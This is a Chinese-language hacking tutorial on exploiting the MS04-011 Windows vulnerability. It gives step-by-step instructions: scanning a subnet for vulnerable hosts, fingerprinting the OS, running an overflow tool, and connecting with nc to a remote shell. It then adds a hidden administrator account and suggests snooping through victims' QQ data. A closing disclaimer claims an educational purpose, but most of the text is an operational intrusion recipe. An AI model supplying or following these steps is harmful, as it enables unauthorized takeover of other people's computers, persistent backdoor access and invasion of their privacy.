呵呵,大家都應知道這個漏洞吧,哈哈,它好厲害哦。HACKER們利用它來可以得到操作系統的administrators權限,得到系統的shell。不多說別的,看看他們都是入何入侵別人的機器吧。
1. 首先,去下載ms04011漏洞溢出的工具,網上有好多哦。
工具中包括了DSScan, GetOS, MS04011溢出工具
DSScan:這個工具是用來掃描系統是否有MS04011漏洞的工具,當掃描到目標機器就此漏洞,便會列出它的ip地址,主機名, netbios名稱, 還有最重要的就是狀態信息. 它可以掃描到在此ip斷內所有存活的主機,如果有MS04011漏洞的機器,在狀態信息就列出vulnerable,否則爲not vulnerable。一般一次掃描64個ip地址。
GetOS:其是用來獲得操作系統的類型,但必須對方機的139端口開放.
MS04011:其就是用來溢出的工具了.
2.如何溢出
首先用DSScan,在IP斷內輸入IP, 然後點那個右鍵頭,使其進入右邊的框內,可以多選
然後點擊開始就可以.例如,我們掃到一個機器的結果爲這樣
Ip hostname netbios status
192.168.1.33 You You vulnerable
192.168.1.34 haha haha not vulnerable
大家可以看到192.168.1.33的機器status爲vulnerable,這就說明它存在這ms04011的漏洞。
下面就讓我們去溢出它吧,在開始溢出前先要得到對方機器的類型。用Getos來得到
在運行用輸入cmd,回車,然後到你的程序路徑下,輸入getos 192.168.1.33
結果就會出現
[*] Connecting Port 139…..
[*] Sending session request…..
[*] Sending negotiation request….
[*] Sending setup account request….
[*] Successful…….
Remote OS:
-------------
WORKGROUP 這是工作組名
Windows 2000 LAN Manger
Windows 5.0 這就是操作系統的類型,如果爲windows 5.1那麼就是xp 了
好了,我們知道它的類型是2000了,那麼我們就馬上用 ms04011來溢出吧
先打開兩個cmd窗口, 在兩個裏面同時輸入ms04011 0 192.168.1.33 然後一個一個的回車
在一個cmd裏會出現
Shellcode size 404
Ret value = 1726 //注意1726纔是溢出成功的代碼
對於xp系統要用 Ms04011 1 192.168.1.33
3.如何得到機器的shell
要用到最厲害的瑞士軍刀了(名稱是NC), 哈哈,這個工具可不一般啊,到網上下載吧
然後在cmd內輸入nc 192.168.1.33 1234。 1234是溢出的端口號.哈哈是不是出現了這樣的提示
C:/winnt/system32>
//哈哈,你成功了。你可以對其操作了
比如:
Net user haha 123 /add //在對方機器可以建立名爲haha, 密碼爲123 的用戶
Net localgroup administrators haha /add //使haha列入administrators組.
<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />
當然可以到應用程序的tencent目錄裏看看MM的QQ號啊,以後常聯繫哦。
嚴重聲明:不可以利用此方法做非法行爲,如發現本人不負任何責任。發表此文的目的在於使大家重視自已係統的安全,常打補丁。在國內有好多的機器存在這樣的漏洞,唉!!!!!